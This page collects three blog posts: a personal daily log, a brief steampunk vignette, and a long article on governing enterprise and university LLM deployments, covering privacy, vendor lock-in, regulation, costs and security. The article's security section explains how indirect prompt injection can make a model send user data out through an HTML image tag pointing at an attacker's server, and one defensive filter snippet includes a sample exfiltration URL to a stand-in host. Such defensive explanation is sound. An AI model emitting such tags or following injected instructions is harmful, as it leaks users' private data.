Want to join in? Respond to our weekly writing prompts, open to everyone.
from
Roscoe's Story
In Summary: * Another good day, with more quality family visiting than we've had for a long time. With the Miami / Ohio St. game currently in the 3rd qtr., I'm wondering if I'll be able to stay awake through the rest of the game. Eyes are getting heavy and the brain's starting to fog.
Prayers, etc.: My daily prayers
Health Metrics: * bw= 222.2 lbs. 100.80 kg * bp= 150/86 (67)
Exercise: * kegel pelvic floor exercise, half squats, calf raises, wall push-ups
Diet: * 06:30 – 1 banana, 1 peanut butter sandwich * 11:35 – plate of pancit * 15:00 – steak, homemade vegetable soup, mashed potatoes, white rice, fresh fruit, cake
Activities, Chores, etc.: * 05:00 – listen to local news talk radio * 05:30 – read, pray, follow news reports from various sources, surf the socials, nap * 07:45 – bank accounts activity monitored * 11:23 – tuned into the ReliaQuest Bowl, Iowa Hawkeyes vs Vanderbilt Commodores, the game already in progress, Iowa leads 7 to 0 in the 1st qtr. * 11:30 to 18:00 – daughter-in-law and her fiancé came over and spent the day visiting. He and I “sort of” watched Duke beat Arizona St. while doing “chores” to help the women as they fixed us a big meal. * 18:30 – listening now to NCAA Football, the Cotton Bowl Game, Miami Hurricanes vs Ohio St. Buckeyes
Chess: * 11:20 – moved in all pending CC games
from
hustin.art
The alchemist's fingers trembled as the orrery gears ground to a halt—wrong again. “Your calculations are off by 0.003 degrees, Brother Eliasz,” sneered the Archbishop's automaton, its voice like grinding cathedral pipes. Outside, the copper-plated spires of Neo-Lutetia hummed with forbidden electricity. I wiped quicksilver from my brow. “Bullshit. Your Ptolemaic models are obsolete.” The stained glass windows rattled as the celestial engines misfired. Somewhere below, the peasant riots began. The automaton's censer swung ominously. “Heresy has a price.” Damn right. I yanked the hidden lever. Let them choke on Kepler's truth for once.
from
SmarterArticles

When Stanford University's Provost charged the AI Advisory Committee in March 2024 to assess the role of artificial intelligence across the institution, the findings revealed a reality that most enterprise leaders already suspected but few wanted to admit: nobody really knows how to do this yet. The committee met seven times between March and June, poring over reports from Cornell, Michigan, Harvard, Yale, and Princeton, searching for a roadmap that didn't exist. What they found instead was a landscape of improvisation, anxiety, and increasingly urgent questions about who owns what, who's liable when things go wrong, and whether locking yourself into a single vendor's ecosystem is a feature or a catastrophic bug.
The promise is intoxicating. Large language models can answer customer queries, draft research proposals, analyse massive datasets, and generate code at speeds that make traditional software look glacial. But beneath the surface lies a tangle of governance nightmares that would make even the most seasoned IT director reach for something stronger than coffee. According to research from MIT, 95 per cent of enterprise generative AI implementations fail to meet expectations. That staggering failure rate isn't primarily a technology problem. It's an organisational one, stemming from a lack of clear business objectives, insufficient governance frameworks, and infrastructure not designed for the unique demands of inference workloads.
Let's start with the most basic question that organisations seem unable to answer consistently: who is accountable when an LLM generates misinformation, reveals confidential student data, or produces biased results that violate anti-discrimination laws?
This isn't theoretical. In 2025, researchers disclosed multiple vulnerabilities in Google's Gemini AI suite, collectively known as the “Gemini Trifecta,” capable of exposing sensitive user data and cloud assets. Around the same time, Perplexity's Comet AI browser was found vulnerable to indirect prompt injection, allowing attackers to steal private data such as emails and banking credentials through seemingly safe web pages.
The fundamental challenge is this: LLMs don't distinguish between legitimate instructions and malicious prompts. A carefully crafted input can trick a model into revealing sensitive data, executing unauthorised actions, or generating content that violates compliance policies. Studies show that as many as 10 per cent of generative AI prompts can include sensitive corporate data, yet most security teams lack visibility into who uses these models, what data they access, and whether their outputs comply with regulatory requirements.
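That visibility gap is at least partly addressable at the boundary. Below is a minimal sketch, in Python, of a pre-flight scanner that checks outbound prompts for obvious sensitive-data patterns before they leave the organisation; the three patterns and the `gated_send` wrapper are illustrative stand-ins, not a production DLP control.

```python
import re

# Illustrative patterns only; real DLP tooling uses far richer classifiers.
PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+\.[\w.-]+\b"),
    "us_ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "api_key": re.compile(r"\b(?:sk|pk)-[A-Za-z0-9]{20,}\b"),
}

def scan_prompt(prompt: str) -> list[str]:
    """Return the categories of sensitive data detected in a prompt."""
    return [name for name, pattern in PATTERNS.items() if pattern.search(prompt)]

def gated_send(prompt: str, send):
    """Refuse to forward a prompt that matches any sensitive-data pattern."""
    findings = scan_prompt(prompt)
    if findings:
        raise PermissionError(f"Prompt blocked, contains: {', '.join(findings)}")
    return send(prompt)
```

A real deployment would route findings into the security team's telemetry rather than simply raising an error, but even a crude gate like this gives visibility into what would otherwise leave silently.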
Effective governance begins with establishing clear ownership structures. Organisations must define roles for model owners, data stewards, and risk managers, creating accountability frameworks that span the entire model lifecycle. The Institute of Internal Auditors' Three Lines Model provides a framework that some organisations have adapted for AI governance: management serves as the first line of defence, risk and compliance functions as the second, and internal audit as the third, with the governing body setting the organisation's AI risk appetite and ethical boundaries.
But here's where theory meets practice in uncomfortable ways. One of the most common challenges in LLM governance is determining who is accountable for the outputs of a model that constantly evolves. Research underscores that operationalising accountability requires clear ownership, continuous monitoring, and mandatory human-in-the-loop oversight to bridge the gap between autonomous AI outputs and responsible human decision-making.
Effective generative AI governance requires establishing a RACI (Responsible, Accountable, Consulted, Informed) framework. This means identifying who is responsible for day-to-day model operations, who is ultimately accountable for outcomes, who must be consulted before major decisions, and who should be kept informed. Without this clarity, organisations risk creating accountability gaps where critical failures can occur without anyone taking ownership. The framework must also address the reality that LLMs deployed today may behave differently tomorrow, as models are updated, fine-tuned, or influenced by changing training data.
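To show how concrete this can be, a RACI matrix reduces to a lookup table that the governance process maintains. The roles and lifecycle activities below are hypothetical; the point is simply that every activity must resolve to exactly one accountable owner.

```python
from dataclasses import dataclass

@dataclass
class RaciEntry:
    responsible: str        # does the day-to-day work
    accountable: str        # ultimately answers for outcomes
    consulted: list[str]    # must be asked before major decisions
    informed: list[str]     # kept up to date

# Hypothetical assignments for a model's lifecycle activities.
RACI = {
    "model_update":      RaciEntry("ml-platform", "head-of-ai", ["security"], ["legal"]),
    "prompt_change":     RaciEntry("product", "product-owner", ["risk"], ["support"]),
    "incident_response": RaciEntry("security", "ciso", ["legal", "comms"], ["board"]),
}

def accountable_for(activity: str) -> str:
    """Every lifecycle activity maps to exactly one accountable owner."""
    return RACI[activity].accountable

assert accountable_for("model_update") == "head-of-ai"
```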
In late 2022, Samsung employees used ChatGPT to help with coding tasks, inputting proprietary source code. OpenAI's service was, at that time, using user prompts to further train their model. The result? Samsung's intellectual property potentially became part of the training data for a publicly available AI system.
This incident crystallised a fundamental tension in enterprise LLM deployment: the very thing that makes these systems useful (their ability to learn from context) is also what makes them dangerous. Fine-tuning embeds pieces of your data into the model's weights, which can introduce serious security and privacy risks. If those weights “memorise” sensitive content, the model might later reveal it to end users or attackers via its outputs.
The privacy risks fall into two main categories. First, input privacy breaches occur when data is exposed to third-party AI platforms during training. Second, output privacy issues arise when users can intentionally or inadvertently craft queries to extract private training data from the model itself. Research has revealed a mechanism in LLMs where if the model generates uncontrolled or incoherent responses, it increases the chance of revealing memorised text.
Different LLM providers handle data retention and training quite differently. Anthropic, for instance, does not use customer data for training unless there is explicit opt-in consent. Default retention is 30 days across most Claude products, but API logs shrink to seven days starting 15 September 2025. For organisations with stringent compliance requirements, Anthropic offers an optional Zero-Data-Retention addendum that ensures maximum data isolation. ChatGPT Enterprise and Business plans automatically do not use prompts or outputs for training, with no action required. However, the standard version of ChatGPT allows conversations to be reviewed by the OpenAI team and used for training future versions of the model. This distinction between enterprise and consumer tiers becomes critical when institutional data is at stake.
Universities face particular challenges because of regulatory frameworks like the Family Educational Rights and Privacy Act (FERPA) in the United States. FERPA requires schools to protect the privacy of personally identifiable information in education records. As generative artificial intelligence tools become more widespread, the risk of improper disclosure of sensitive data protected by FERPA increases.
At the University of Florida, faculty, staff, and students must exercise caution when providing inputs to AI models. Only publicly available data or data that has been authorised for use should be provided to the models. Using an unauthorised AI assistant during Zoom or Teams meetings to generate notes or transcriptions may involve sharing all content with the third-party vendor, which may use that data to train the model.
Instructors should consider FERPA guidelines before submitting student work to generative AI tools like chatbots (e.g., generating draft feedback on student work) or using tools like Zoom's AI Companion. Proper de-identification under FERPA requires removal of all personally identifiable information, as well as a reasonable determination made by the institution that a student's identity is not personally identifiable. Depending on the nature of the assignment, student work could potentially include identifiable information if they are describing personal experiences that would need to be removed.
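As a sketch of what mechanical de-identification might look like before student text reaches a chatbot, the snippet below redacts known names, ID-like numbers, and campus email addresses. The patterns and the sample essay are illustrative only; FERPA-grade de-identification requires a reasonable institutional determination, not just regex substitution.

```python
import re

def deidentify(text: str, known_names: list[str]) -> str:
    """Redact obvious identifiers before text leaves the institution."""
    for name in known_names:
        text = re.sub(re.escape(name), "[STUDENT]", text, flags=re.IGNORECASE)
    text = re.sub(r"\b\d{7,9}\b", "[ID]", text)                  # ID-like numbers
    text = re.sub(r"\b[\w.+-]+@[\w-]+\.edu\b", "[EMAIL]", text)  # campus emails
    return text

essay = "Jane Doe (ID 12345678, jdoe@campus.edu) described her internship."
print(deidentify(essay, known_names=["Jane Doe"]))
# -> [STUDENT] (ID [ID], [EMAIL]) described her internship.
```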
Here's a scenario that keeps enterprise architects awake at night: you've invested eighteen months integrating OpenAI's GPT-4 into your customer service infrastructure. You've fine-tuned models, built custom prompts, trained your team, and embedded API calls throughout your codebase. Then OpenAI changes their pricing structure, deprecates the API version you're using, or introduces terms of service that conflict with your regulatory requirements. What do you do?
The answer, for most organisations, is exactly what the vendor wants you to do: nothing. Migration costs are prohibitive. A 2025 survey of 1,000 IT leaders found that 88.8 per cent believe no single cloud provider should control their entire stack, and 45 per cent say vendor lock-in has already hindered their ability to adopt better tools.
The scale of vendor lock-in extends beyond API dependencies. Gartner estimates that data egress fees consume 10 to 15 per cent of a typical cloud bill. Sixty-five per cent of enterprises planning generative AI projects say soaring egress costs are a primary driver of their multi-cloud strategy. These egress fees represent a hidden tax on migration, making it financially painful to move your data from one cloud provider to another. The vendors know this, which is why they often offer generous ingress pricing (getting your data in) whilst charging premium rates for egress (getting your data out).
So what's the escape hatch? The answer involves several complementary strategies. First, AI model gateways act as an abstraction layer between your applications and multiple model providers. Your code talks to the gateway's unified interface rather than to each vendor directly. The gateway then routes requests to the optimal underlying model (OpenAI, Anthropic, Gemini, a self-hosted LLaMA, etc.) without your application code needing vendor-specific changes.
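A minimal sketch of the gateway pattern, assuming each vendor SDK is wrapped in an adapter exposing a common signature (the provider classes here are placeholders, not real SDK clients):

```python
from typing import Protocol

class ChatProvider(Protocol):
    def complete(self, prompt: str) -> str: ...

class EchoProvider:
    """Stand-in for a real vendor adapter (OpenAI, Anthropic, self-hosted...)."""
    def __init__(self, name: str):
        self.name = name
    def complete(self, prompt: str) -> str:
        return f"[{self.name}] {prompt}"

class Gateway:
    def __init__(self, providers: dict[str, ChatProvider], default: str):
        self.providers = providers
        self.default = default

    def complete(self, prompt: str, route: str | None = None) -> str:
        # Application code only ever calls gateway.complete(); switching
        # vendors means editing this routing table, not every call site.
        return self.providers[route or self.default].complete(prompt)

gateway = Gateway({"a": EchoProvider("vendor-a"), "b": EchoProvider("vendor-b")}, default="a")
print(gateway.complete("Summarise this ticket."))
```

Production gateways layer retries, cost-based routing, logging, and failover on top of this same routing idea.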
Second, open protocols and standards are emerging. Anthropic's open-source Model Context Protocol and LangChain's Agent Protocol promise interoperability between LLM vendors. If an API changes, you don't need a complete rewrite, just a new connector.
Third, local and open-source LLMs are increasingly preferred. They're cheaper, more flexible, and allow full data control. Survey data shows strategies that are working: 60.5 per cent keep some workloads on-site for more control; 53.8 per cent use cloud-agnostic tools not tied to a single provider; 50.9 per cent negotiate contract terms for better portability.
A particularly interesting development is Perplexity's TransferEngine communication library, which addresses the challenge of running large models on AWS's Elastic Fabric Adapter by acting as a universal translator, abstracting away hardware-specific details. This means that the same code can now run efficiently on both NVIDIA's specialised hardware and AWS's more general-purpose infrastructure. This kind of abstraction layer represents the future of portable AI infrastructure.
The design principle for 2025 should be “hybrid-first, not hybrid-after.” Organisations should embed portability and data control from day one, rather than treating them as bolt-ons or manual migrations. A cloud exit strategy is a comprehensive plan that outlines how an organisation can migrate away from its current cloud provider with minimal disruption, cost, or data loss. Smart enterprises treat cloud exit strategies as essential insurance policies against future vendor dependency.
If you think negotiating a traditional SaaS contract is complicated, wait until you see what LLM vendors are putting in front of enterprise legal teams. LLM terms may look like those of any other software agreement, but certain provisions deserve far more scrutiny. Widespread use of LLMs is still relatively new and fraught with unknown risks, so vendors are shifting those risks to customers. These products are still evolving and often unreliable, with nearly every contract containing an “AS-IS” disclaimer.
When assessing LLM vendors, enterprises should scrutinise availability, service-level agreements, version stability, and support. An LLM might perform well in standalone tests but degrade under production load, failing to meet latency SLAs or producing incomplete responses. The AI service description should be as specific as possible about what the service does. Choose data ownership and privacy provisions that align with your regulatory requirements and business needs.
Here's where things get particularly thorny: vendor indemnification for third-party intellectual property infringement claims has long been a staple of SaaS contracts, but it took years of public pressure and high-profile lawsuits for LLM pioneers like OpenAI to relent and agree to indemnify users. Only a handful of other LLM vendors have followed suit. The concern is legitimate. LLMs are trained on vast amounts of internet data, some of which may be copyrighted material. If your LLM generates output that infringes on someone's copyright, who bears the legal liability? In traditional software, the vendor typically indemnifies you. In AI contracts, vendors have tried to push this risk onto customers.
Enterprise buyers are raising their bar for AI vendors. Expect security questionnaires to add AI-specific sections that ask about purpose tags, retrieval redaction, cross-border routing, and lineage. Procurement rules increasingly demand algorithmic-impact assessments alongside security certifications for public accountability. Customers, particularly enterprise buyers, demand transparency about how companies use AI with their data. Clear governance policies, third-party certifications, and transparent AI practices become procurement requirements and competitive differentiators.
In 2025, the European Union's AI Act introduced a tiered, risk-based classification system, categorising AI systems as unacceptable, high, limited, or minimal risk. Providers of general-purpose AI now have transparency, copyright, and safety-related duties. The Act's extraterritorial reach means that organisations outside Europe must still comply if they're deploying AI systems that affect EU citizens.
In the United States, Executive Order 14179 guides how federal agencies oversee the use of AI in civil rights, national security, and public services. The White House AI Action Plan calls for creating an AI procurement toolbox managed by the General Services Administration that facilitates uniformity across the Federal enterprise. This system would allow any Federal agency to easily choose among multiple models in a manner compliant with relevant privacy, data governance, and transparency laws.
The Enterprise AI Governance and Compliance Market is expected to reach 9.5 billion US dollars by 2035, likely to surge at a compound annual growth rate of 15.8 per cent. Between 2020 and 2025, this market expanded from 0.4 billion to 2.2 billion US dollars, representing cumulative growth of 450 per cent. This explosive growth signals that governance is no longer a nice-to-have. It's a fundamental requirement for AI deployment.
ISO 42001 allows certification of an AI management system that integrates well with ISO 27001 and 27701. NIST's Generative AI profile gives a practical control catalogue and shared language for risk. Financial institutions face intense regulatory scrutiny, requiring model risk management that applies the OCC Bulletin 2011-12 framework to all AI/ML models, with rigorous validation, independent review, and ongoing monitoring. The NIST AI Risk Management Framework offers structured, risk-based guidance for building and deploying trustworthy AI, widely adopted across industries for its practical, adaptable advice across four functions: govern, map, measure, and manage.
For organisations operating in Europe or handling European citizens' data, the General Data Protection Regulation introduces requirements that fundamentally reshape how LLM deployments must be architected. The GDPR restricts how personal data can be transferred outside the EU. Any transfer of personal data to non-EU countries must meet adequacy, Standard Contractual Clauses, Binding Corporate Rules, or explicit consent requirements. Failing to meet these conditions can result in fines up to 20 million euros or 4 per cent of global annual revenue.
Data sovereignty is about legal jurisdiction: which government's laws apply. Data residency is about physical location: where your servers actually sit. A common scenario that creates problems: a company stores European customer data in AWS Frankfurt (data residency requirement met), but database administrators access it from the US headquarters. Under GDPR, that US access might trigger cross-border transfer requirements regardless of where the data physically lives.
Sovereign AI infrastructure refers to cloud environments that are physically and legally rooted in national or EU jurisdictions. All data including training, inference, metadata, and logs must remain physically and logically located in EU territories, ensuring compliance with data transfer laws and eliminating exposure to foreign surveillance mandates. Providers must be legally domiciled in the EU and not subject to extraterritorial laws like the U.S. CLOUD Act, which allows US-based firms to share data with American authorities, even when hosted abroad.
OpenAI announced data residency in Europe for ChatGPT Enterprise, ChatGPT Edu, and the API Platform, helping organisations operating in Europe meet local data sovereignty requirements. For European companies using LLMs, best practices include only engaging providers who are willing to sign a Data Processing Addendum and act as your processor. Verify where your data will be stored and processed, and what safeguards are in place. If a provider cannot clearly answer these questions or hesitates on compliance commitments, consider it a major warning sign.
Achieving compliance with data residency and sovereignty requirements requires more than geographic awareness. It demands structured policy, technical controls, and ongoing legal alignment. Hybrid cloud architectures enable global orchestration with localised data processing to meet residency requirements without sacrificing performance.
The economics of self-hosted versus cloud-based LLM deployment present a decision tree that looks deceptively simple on the surface but becomes fiendishly complex when you factor in hidden costs and the rate of technological change.
Here's the basic arithmetic: you need more than 8,000 conversations per day before hosting a relatively small model on your own infrastructure becomes cheaper than a managed solution from a cloud provider. Self-hosted LLM deployments involve substantial upfront capital expenditure. High-end GPU configurations suitable for large model inference can cost 100,000 to 500,000 US dollars or more, depending on performance requirements.
To generate approximately one million tokens (about as much as a single A100 GPU can produce in a day), it would cost 0.12 US dollars on DeepInfra via API, 0.71 US dollars on Azure AI Foundry via API, 43 US dollars on Lambda Labs, or 88 US dollars on Azure servers. In practice, even at 100 million tokens per day, API costs (roughly 21 US dollars per day) are so low that it's hard to justify the overhead of self-managed GPUs on cost alone.
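A back-of-the-envelope comparison using the figures quoted above makes the point concrete; the throughput and prices are the rough numbers cited in this article, so treat the output as illustrative rather than a procurement model.

```python
API_USD_PER_M_TOKENS = 0.12   # cheapest API rate quoted above (DeepInfra)
GPU_USD_PER_DAY = 43.0        # rented GPU per day (Lambda Labs figure above)
GPU_M_TOKENS_PER_DAY = 1.0    # roughly one million tokens per GPU per day

for load_m in (1, 10, 100):
    api_cost = API_USD_PER_M_TOKENS * load_m
    gpus_needed = max(1, round(load_m / GPU_M_TOKENS_PER_DAY))
    self_hosted_cost = gpus_needed * GPU_USD_PER_DAY
    print(f"{load_m:>4}M tokens/day: API ${api_cost:>7.2f} vs self-hosted ${self_hosted_cost:>8.2f}")

# At these prices the API wins on raw cost at every scale; self-hosting
# has to be justified by control, privacy, or latency instead.
```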
But cost isn't the only consideration. Self-hosting offers more control over data privacy since the models operate on the company's own infrastructure. This setup reduces the risk of data breaches involving third-party vendors and allows implementing customised security protocols. Open-source LLMs work well for research institutions, universities, and businesses that handle high volumes of inference and need models tailored to specific requirements. By self-hosting open-source models, high-throughput organisations can avoid the growing per-token fees associated with proprietary APIs.
However, hosting open-source LLMs on your own infrastructure introduces variable costs that depend on factors like hardware setup, cloud provider rates, and operational requirements. Additional expenses include storage, bandwidth, and associated services. Open-source models rely on internal teams to handle updates, security patches, and performance tuning. These ongoing tasks contribute to the daily operational budget and influence long-term expenses.
For flexibility and cost-efficiency with low or irregular traffic, LLM-as-a-Service is often the best choice. LLMaaS platforms offer compelling advantages for organisations seeking rapid AI adoption, minimal operational complexity, and scalable cost structures. The subscription-based pricing models provide cost predictability and eliminate large upfront investments, making AI capabilities accessible to organisations of all sizes.
Universities face a unique challenge: they need to balance pedagogical openness with security and privacy requirements. The mission of higher education includes preparing students for a world where AI literacy is increasingly essential. Banning these tools outright would be pedagogically irresponsible. But allowing unrestricted access creates governance nightmares.
At Stanford, the MBA and MSx programmes leave it to instructors whether to permit student use of AI tools for take-home coursework, including assignments and examinations. Instructors may likewise choose whether to allow AI tools for in-class work. PhD and undergraduate courses follow the Generative AI Policy Guidance from Stanford's Office of Community Standards. This tiered approach recognises that different educational contexts require different policies.
The 2025 EDUCAUSE AI Landscape Study revealed that fewer than 40 per cent of higher education institutions surveyed have AI acceptable use policies. Many institutions do not yet have a clear, actionable AI strategy, practical guidance, or defined governance structures to manage AI use responsibly. Key takeaways from the study include a rise in strategic prioritisation of AI, growing institutional governance and policies, heavy emphasis on faculty and staff training, widespread AI use for teaching and administrative tasks, and notable disparities in resource distribution between larger and smaller institutions.
Universities face particular challenges around academic integrity. Research shows that 89 per cent of students admit to using AI tools like ChatGPT for homework. Studies report that approximately 46.9 per cent of students use LLMs in their coursework, with 39 per cent admitting to using AI tools to answer examination or quiz questions.
Universities primarily use Turnitin, Copyleaks, and GPTZero for AI detection, spending 2,768 to 110,400 US dollars per year on these tools. Many top schools deactivated AI detectors in 2024 to 2025 due to approximately 4 per cent false positive rates. It can be very difficult to accurately detect AI-generated content, and detection tools claim to identify work as AI-generated but cannot provide evidence for that claim. Human experts who have experience with using LLMs for writing tasks can detect AI with 92 per cent accuracy, though linguists without such experience were not able to achieve the same level of accuracy.
Experts recommend the use of both human reasoning and automated detection. It is considered unfair to exclusively use AI detection to evaluate student work due to false positive rates. After receiving a positive prediction, next steps should include evaluating the student's writing process and comparing the flagged text to their previous work. Institutions must clearly and consistently articulate their policies on academic integrity, including explicit guidelines on appropriate and inappropriate use of AI tools, whilst fostering open dialogues about ethical considerations and the value of original academic work.
Whilst fine-tuning models with proprietary data introduces significant privacy risks, Retrieval-Augmented Generation has emerged as a safer and more cost-effective approach for injecting organisational knowledge into enterprise AI systems. According to Gartner, approximately 80 per cent of enterprises are utilising RAG methods, whilst about 20 per cent are employing fine-tuning techniques.
RAG operates through two core phases. First comes ingestion, where enterprise content is encoded into dense vector representations called embeddings and indexed so relevant items can be efficiently retrieved. This preprocessing step transforms documents, database records, and other unstructured content into a machine-readable format that enables semantic search. Second is retrieval and generation. For a user query, the system retrieves the most relevant snippets from the indexed knowledge base and augments the prompt sent to the LLM. The model then synthesises an answer that can include source attributions, making the response both more accurate and transparent.
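A toy version of both phases, assuming a placeholder embedding function; a real deployment would use an embedding model and a vector database rather than an in-memory list.

```python
import hashlib
import numpy as np

def embed(text: str) -> np.ndarray:
    """Deterministic placeholder embedding; swap in a real embedding model."""
    seed = int(hashlib.md5(text.encode()).hexdigest()[:8], 16)
    return np.random.default_rng(seed).standard_normal(384)

# Phase 1, ingestion: encode enterprise content once and index it.
documents = ["Refund policy: 30 days with receipt.", "Support hours: 9-5 weekdays."]
index = [(doc, embed(doc)) for doc in documents]

def retrieve(query: str, k: int = 1) -> list[str]:
    """Phase 2a, retrieval: rank indexed snippets by cosine similarity."""
    q = embed(query)
    def score(item):
        doc, vec = item
        return float(q @ vec) / (np.linalg.norm(q) * np.linalg.norm(vec))
    return [doc for doc, _ in sorted(index, key=score, reverse=True)[:k]]

def grounded_prompt(query: str) -> str:
    """Phase 2b, generation: augment the prompt with retrieved sources."""
    context = "\n".join(f"- {s}" for s in retrieve(query))
    return f"Answer using only these sources:\n{context}\n\nQuestion: {query}"

print(grounded_prompt("What is the refund window?"))
```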
By grounding responses in retrieved facts, RAG reduces the likelihood of hallucinations. When an LLM generates text based on retrieved documents rather than attempting to recall information from training, it has concrete reference material to work with. This doesn't eliminate hallucinations entirely (models can still misinterpret retrieved content) but it substantially improves reliability compared to purely generative approaches. RAG delivers substantial return on investment, with organisations reporting 30 to 60 per cent reduction in content errors, 40 to 70 per cent faster information retrieval, and 25 to 45 per cent improvement in employee productivity.
RAG Vector-Based AI leverages vector embeddings to retrieve semantically similar data from dense vector databases, such as Pinecone or Weaviate. The approach is based on vector search, a technique that converts text into numerical representations (vectors) and then finds documents that are most similar to a user's query. Research findings reveal that enterprise adoption is largely in the experimental phase: 63.6 per cent of implementations utilise GPT-based models, and 80.5 per cent rely on standard retrieval frameworks such as FAISS or Elasticsearch.
A strong data governance framework is foundational to ensuring the quality, integrity, and relevance of the knowledge that fuels RAG systems. Such a framework encompasses the processes, policies, and standards necessary to manage data assets effectively throughout their lifecycle. From data ingestion and storage to processing and retrieval, governance practices ensure that the data driving RAG solutions remain trustworthy and fit for purpose. Ensuring data privacy and security within a RAG-enhanced knowledge management system is critical. To make sure RAG only retrieves data from authorised sources, companies should implement strict role-based permissions, multi-factor authentication, and encryption protocols.
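One way to make “only retrieves from authorised sources” concrete is to filter by the caller's roles at the retrieval layer, so the model never sees a document the user could not open directly. A sketch, with hypothetical roles and documents:

```python
from dataclasses import dataclass, field

@dataclass
class Document:
    text: str
    allowed_roles: set[str] = field(default_factory=set)

CORPUS = [
    Document("Public pricing sheet for 2025.", {"public", "staff"}),
    Document("Unreleased salary bands.", {"hr"}),
]

def retrieve_for(user_roles: set[str]) -> list[str]:
    """Only documents whose ACL intersects the caller's roles are retrievable."""
    return [d.text for d in CORPUS if d.allowed_roles & user_roles]

print(retrieve_for({"staff"}))  # -> ['Public pricing sheet for 2025.']
```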
When it comes to enterprise-grade LLM platforms, three dominant cloud providers have emerged. The AI landscape in 2025 is defined by Azure AI Foundry (Microsoft), AWS Bedrock (Amazon), and Google Vertex AI. Each brings a unique approach to generative AI, from model offerings to fine-tuning, MLOps, pricing, and performance.
Azure OpenAI distinguishes itself by offering direct access to robust models like OpenAI's GPT-4, DALL·E, and Whisper. Recent additions include support for xAI's Grok Mini and Anthropic Claude. For teams whose highest priority is access to OpenAI's flagship GPT models within an enterprise-grade Microsoft environment, Azure OpenAI remains best fit, especially when seamless integration with Microsoft 365, Cognitive Search, and Active Directory is needed.
Azure OpenAI is hosted within Microsoft's highly compliant infrastructure. Features include Azure role-based access control, Customer Lockbox (requiring customer approval before Microsoft accesses data), private networking to isolate model endpoints, and data-handling transparency where customer prompts and responses are not stored or used for training. Azure OpenAI supports HIPAA, GDPR, ISO 27001, SOC 1/2/3, FedRAMP High, HITRUST, and more. Azure offers more on-premises and hybrid cloud deployment options compared to Google, enabling organisations with strict data governance requirements to maintain greater control.
Google Cloud Vertex AI stands out with its strong commitment to open source. As the creators of TensorFlow, Google has a long history of contributing to the open-source AI community. Vertex AI offers an unmatched variety of over 130 generative AI models, advanced multimodal capabilities, and seamless integration with Google Cloud services.
Organisations focused on multi-modal generative AI, rapid low-code agent deployment, or deep integration with Google's data stack will find Vertex AI a compelling alternative. For enterprises with large datasets, Vertex AI's seamless connection with BigQuery enables powerful analytics and predictive modelling. Google Vertex AI is more cost-effective, providing a quick return on investment with its scalable models.
The most obvious difference is in Google Cloud's developer and API focus, whereas Azure is geared more towards building user-friendly cloud applications. Enterprise applications benefit from each platform's specialties: Azure OpenAI excels in Microsoft ecosystem integration, whilst Google Vertex AI excels in data analytics. For teams using AWS infrastructure, AWS Bedrock provides access to multiple foundation models from different providers, offering a middle ground between Azure's Microsoft-centric approach and Google's open-source philosophy.
In AI security vulnerabilities reported to Microsoft, indirect prompt injection is one of the most widely-used techniques. It is also the top entry in the OWASP Top 10 for LLM Applications and Generative AI 2025. A prompt injection vulnerability occurs when user prompts alter the LLM's behaviour or output in unintended ways.
With a direct prompt injection, an attacker explicitly provides a cleverly crafted prompt that overrides or bypasses the model's intended safety and content guidelines. With an indirect prompt injection, the attack is embedded in external data sources that the LLM consumes and trusts. The rise of multimodal AI introduces unique prompt injection risks. Malicious actors could exploit interactions between modalities, such as hiding instructions in images that accompany benign text.
One of the most widely-reported impacts is the exfiltration of the user's data to the attacker. The prompt injection causes the LLM to first find and/or summarise specific pieces of the user's data and then to use a data exfiltration technique to send these back to the attacker. Several data exfiltration techniques have been demonstrated, including data exfiltration through HTML images, causing the LLM to output an HTML image tag where the source URL is the attacker's server.
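Deterministic output filtering can close this particular channel. The sketch below strips image tags whose source host is not on an allow-list; the allowed host is hypothetical.

```python
import re

ALLOWED_HOSTS = {"assets.internal.example.com"}  # hypothetical trusted host

IMG_TAG = re.compile(r'<img[^>]+src=["\'](?P<url>[^"\']+)["\']', re.IGNORECASE)

def strip_untrusted_images(llm_output: str) -> str:
    """Replace image tags whose source host is not on the allow-list."""
    def check(match: re.Match) -> str:
        host = re.sub(r"^https?://", "", match.group("url")).split("/")[0]
        return match.group(0) if host in ALLOWED_HOSTS else "[image removed]"
    return IMG_TAG.sub(check, llm_output)

leaky = '<img src="https://attacker.example/x.png?data=SECRET">'
print(strip_untrusted_images(leaky))  # -> [image removed]
```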
Security controls should combine input/output policy enforcement, context isolation, instruction hardening, least-privilege tool use, data redaction, rate limiting, and moderation with supply-chain and provenance controls, egress filtering, monitoring/auditing, and evaluations/red-teaming.
Microsoft recommends preventative techniques like hardened system prompts and Spotlighting to isolate untrusted inputs, detection tools such as Microsoft Prompt Shields integrated with Defender for Cloud for enterprise-wide visibility, and impact mitigation through data governance, user consent workflows, and deterministic blocking of known data exfiltration methods.
Security leaders should inventory all LLM deployments (you can't protect what you don't know exists), discover shadow AI usage across your organisation, deploy real-time monitoring and establish behavioural baselines, integrate LLM security telemetry with existing SIEM platforms, establish governance frameworks mapping LLM usage to compliance requirements, and test continuously by red teaming models with adversarial prompts. Traditional IT security models don't fully capture the unique risks of AI systems. You need AI-specific threat models that account for prompt injection, model inversion attacks, training data extraction, and adversarial inputs designed to manipulate model behaviour.
So what are organisations that are succeeding actually doing differently? The pattern that emerges from successful deployments is not particularly glamorous: it's governance all the way down.
Organisations that had AI governance programmes in place before the generative AI boom were generally able to better manage their adoption because they already had a committee up and running that had the mandate and the process in place to evaluate and adopt generative AI use cases. They already had policies addressing unique risks associated with AI applications, including privacy, data governance, model risk management, and cybersecurity.
Establishing ownership with a clear responsibility assignment framework prevents rollout failure and creates accountability across security, legal, and engineering teams. Success in enterprise AI governance requires commitment from the highest levels of leadership, cross-functional collaboration, and a culture that values both innovation and responsible deployment. Foster collaboration between IT, security, legal, and compliance teams to ensure a holistic approach to LLM security and governance.
Organisations that invest in robust governance frameworks today will be positioned to leverage AI's transformative potential whilst maintaining the trust of customers, regulators, and stakeholders. In an environment where 95 per cent of implementations fail to meet expectations, the competitive advantage goes not to those who move fastest, but to those who build sustainable, governable, and defensible AI capabilities.
The truth is that we're still in the early chapters of this story. The governance models, procurement frameworks, and security practices that will define enterprise AI in a decade haven't been invented yet. They're being improvised right now, in conference rooms and committee meetings at universities and companies around the world. The organisations that succeed will be those that recognise this moment for what it is: not a race to deploy the most powerful models, but a test of institutional capacity to govern unprecedented technological capability.
